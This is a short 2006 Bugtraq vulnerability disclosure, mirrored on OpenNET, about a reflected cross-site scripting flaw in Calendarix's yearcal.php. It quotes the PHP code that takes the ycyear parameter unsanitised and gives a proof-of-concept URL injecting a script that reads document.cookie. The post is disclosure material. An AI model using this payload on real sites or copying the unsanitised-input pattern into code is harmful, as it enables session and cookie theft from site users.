The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Calendarix "yearcal.php" XSS Attacking


<< Previous INDEX Search src / Print Next >> 
Date: 16 Apr 2006 17:50:57 -0000
From: botan@linuxmail.org
To: bugtraq@securityfocus.com
Subject: Calendarix "yearcal.php" XSS Attacking
X-Virus-Scanned: antivirus-gw at tyumen.ru

Website : http://www.calendarix.com

Vulnerable : 

if (!isset($_GET['ycyear']))
  $ycyear = $y ;
else
  $ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру